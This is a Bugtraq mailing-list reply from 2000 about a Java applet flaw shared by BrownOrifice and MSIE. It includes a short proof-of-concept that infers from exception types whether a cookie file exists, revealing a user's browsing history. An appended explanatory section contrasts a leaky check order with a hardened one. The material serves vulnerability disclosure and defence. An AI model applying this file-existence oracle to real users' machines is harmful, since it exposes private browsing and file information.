Bugtraq mailing list archives
Re: BrownOrifice can break firewalls! NOW MSIE
From: "TAKAGI, Hiromitsu" <takagi () ETL GO JP>
Date: Thu, 24 Aug 2000 09:35:51 +0900
On Sun, 20 Aug 2000 10:55:59 +0300 Alexey Yarovinsky <ayarovin () OLTRES COM> wrote:
> The same security hole exists in MSIE too, with one restriction: the URL
> can't start with file:. But still, an applet from an outside site can
> access your intranet servers, including ftps and ALL sites you have
> access to. The demonstration of the bug is here:
> http://www.oltres.com/ms-bug/

"file:" URLs can be used in the exploit. A malicious applet certainly cannot
read the content of files, but it can determine whether the specified
file exists or not.

    try {
        new WURLConnection("file:/C:/WINDOWS/Cookies/default@playboy[1].txt");
    } catch (SecurityException e) {
        System.out.println("You have visited the Playboy site.");
    } catch (java.io.FileNotFoundException e) {
        System.out.println("You may not have visited the Playboy site.");
    }

Regards,
--
Hiromitsu Takagi
Electrotechnical Laboratory
http://www.etl.go.jp/~takagi/
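
The two catch branches above form an existence oracle: the exception type differs depending on whether the file is present. The following is an added example, not code from the original message or from any vendor's JVM, contrasting a check order that leaks existence with one that does not. It assumes the leak comes from testing existence before policy; the class, method and directory names are hypothetical.

```java
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.nio.file.Files;

public class ExistenceOracleDemo {
    // Hypothetical policy: untrusted code may only touch paths under 'sandbox'.
    static boolean allowed(File f, File sandbox) throws IOException {
        return f.getCanonicalFile().toPath()
                .startsWith(sandbox.getCanonicalFile().toPath());
    }

    // Leaky order: existence is tested first, so a forbidden path yields
    // SecurityException only when the file exists.
    static void openLeaky(File f, File sandbox) throws IOException {
        if (!f.exists()) throw new FileNotFoundException(f.getPath());
        if (!allowed(f, sandbox)) throw new SecurityException("access denied");
    }

    // Hardened order: policy is decided from the path alone, before the
    // file system is consulted, so forbidden paths always fail the same way.
    static void openHardened(File f, File sandbox) throws IOException {
        if (!allowed(f, sandbox)) throw new SecurityException("access denied");
        if (!f.exists()) throw new FileNotFoundException("not found");
    }

    static String outcome(boolean hardened, File f, File sandbox) {
        try {
            if (hardened) openHardened(f, sandbox); else openLeaky(f, sandbox);
            return "opened";
        } catch (SecurityException e) {
            return "SecurityException";
        } catch (FileNotFoundException e) {
            return "FileNotFoundException";
        } catch (IOException e) {
            return "IOException";
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample data: two temp directories, one file outside the sandbox.
        File sandbox = Files.createTempDirectory("sandbox").toFile();
        File outside = Files.createTempDirectory("outside").toFile();
        File present = new File(outside, "present.txt");
        Files.write(present.toPath(), new byte[0]);
        File absent = new File(outside, "absent.txt");
        for (boolean hardened : new boolean[] {false, true}) {
            System.out.println((hardened ? "hardened" : "leaky")
                    + ": present -> " + outcome(hardened, present, sandbox)
                    + ", absent -> " + outcome(hardened, absent, sandbox));
        }
    }
}
```
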
